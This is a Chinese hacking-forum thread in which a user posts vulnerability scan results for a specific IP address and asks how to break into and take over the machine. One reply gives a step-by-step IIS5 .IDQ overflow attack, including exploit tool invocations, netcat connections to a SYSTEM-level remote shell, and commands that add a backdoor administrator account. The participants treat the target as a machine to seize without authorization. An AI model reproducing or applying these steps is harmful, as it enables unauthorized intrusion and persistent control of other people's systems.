|
作者: smx8796 [smx8796] 论坛用户 | 登录 |
我最近扫了一台主机名为KJSERVER的机子,存在诸多漏洞.我想请问各位大哥 我如何利用cgi/asp入侵.又如何获得它的最高权限? 谢谢 |
地主 发表时间: 10/02 12:59 |
回复: frefreeney [frefreeney] 论坛用户 | 登录 |
通过net命令!~具体的!~ |
B1层 发表时间: 10/02 13:11 |
回复: smx8796 [smx8796] 论坛用户 | 登录 |
探测主机:220.170.15.16 检测 Port-> 220.170.15.16 端口 80 [http] 开放 ...OK 检测 Port-> 220.170.15.16 端口 139 [netbios-ssn] 开放 ...OK 检测 Port-> 220.170.15.16 端口 135 [epmap] 开放 ...OK 检测 Port-> 220.170.15.16 端口 443 [https] 开放 ...OK 服务检测 HTTP-> Microsoft-IIS/5.0 发现NULL.printer漏洞-> 220.170.15.16 IIS5.0 NULL.printer Exploit ...OK 发现CGI漏洞-> 220.170.15.16/*.ida (200)...OK 发现CGI漏洞-> 220.170.15.16/*.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/?PageServices (200)...OK 发现CGI漏洞-> 220.170.15.16/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-cs-dump (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-html-rend (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-start-ver (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-stop-ver (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-uncheckout (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-usr-prop (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-ver-diff (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-verify-link (200)...OK 发现CGI漏洞-> 220.170.15.16/?wp-ver-info (200)...OK 发现CGI漏洞-> 220.170.15.16/abczxv.htw (200)...OK 发现CGI漏洞-> 220.170.15.16/blabla.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/author.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/filesize.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/filetime.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/qfullhit.htw (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/qsumrhit.htw (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/query.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/queryhit.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/scripts/samples/search/simple.idq (200)...OK 发现CGI漏洞-> 220.170.15.16/null.htw (200)...OK 发现CGI漏洞-> 220.170.15.16/prxdocs/misc/prxrch.idq (200)...OK |
B2层 发表时间: 10/02 13:18 |
回复: VerZent [verzent] 论坛用户 | 登录 |
发现NULL.printer漏洞-> 220.170.15.16 IIS5.0 NULL.printer Exploit ...OK 发现CGI漏洞-> 220.170.15.16/*.ida (200)...OK 发现CGI漏洞-> 220.170.15.16/*.idq (200)...OK 你在www.google.com 输入.IDQ入侵就有答案了 |
B3层 发表时间: 10/02 16:01 |
回复: VerZent [verzent] 论坛用户 | 登录 |
看 http://snake12.top263.net/IISOverflow/IISOverflow.htm 一共有两个版本.一个是GUI版本.一个是命令行版本. 这里我们来说CUI版本,反正都差不多了,关键是要多试 首先我们要找到有.IDQ漏洞的机子,可以用流光扫一下 运行软件 在被攻击IP地址后面写上对方的IP.端口号一般不需要改动. 左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~ 软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~ 点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了. 接着我们用NC,你可以到到盟下载 WWW.CNHONKER.COM C:\>nc -vv XXX.XXX.XXX.XXX 813 XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> OK!!!上来了 你现在有SYSTEM权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门 net user hacker password /add '添加一给名为hacker,密码为passwod的用户! net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组 OK我们在来看看DOS版本 下载软件后会有个运行文件,它太长了,将它必名为KAWEN D:\>KAWEN 运行参数: 操作系统类型 目的地址 web端口 溢出端口 支持的操作系统 类型: ---- 0 -- IIS5中文Win2k Sp0 1 -- IIS5中文Win2k Sp1 2 -- IIS5中文Win2k Sp2 3 -- IIS5 English Win2k Sp0 4 -- IIS5 English Win2k Sp1 5 -- --not support -- IIS5 English Win2k Sp2 6 -- IIS5 Japanese Win2k Sp0 7 -- IIS5 Japanese Win2k Sp1 8 -- --not support -- IIS5 Japanese Win2k Sp2 D:\>KAWEN 3 XXX.XXX.XXX.XXX80 456 连接目的机器 XXX.XXX.XXX.XXX:80 OK. 发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 现在,你可以 连接 该主机的 端口 456了,good luck.! 开始吧 D:\>nc -vv XXX.XXX.XXX.XXX 456 mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused sent 0, rcvd 0: NOTSOCK 没成功.试试sp1. D:\>KAWEN 4 XXX.XXX.XXX.XXX 80 888 连接目的机器 XXX.XXX.XXX.XXX:80 OK. 发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 现在,你可以 连接 该主机的 端口 888了,good luck.! D:\>nc -vv XXX.XXX.XXX.XXX 888 XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> 看看我们又成功了 |
B4层 发表时间: 10/02 16:03 |
回复: liujunyi [liujunyi] 论坛用户 | 登录 |
检测 Port-> 220.170.15.16 端口 139 [netbios-ssn] 开放 ...OK 检测 Port-> 220.170.15.16 端口 135 [epmap] 开放 ...OK 还有这个,,,看RPC能不能成功啊。 |
B5层 发表时间: 10/02 22:24 |
回复: smx8796 [smx8796] 论坛用户 | 登录 |
VerZent 给我的那个网站打不开啊。 你说的是用什么软件攻击啊 |
B6层 发表时间: 10/03 13:19 |
回复: smx8796 [smx8796] 论坛用户 | 登录 |
大哥大嫂们,可否指点一二啊! 当我好不容易发现一台肉鸡,而又不能对它施行入侵是很郁闷的一件是啊! 有高手请指点啊 |
B7层 发表时间: 10/03 19:50 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号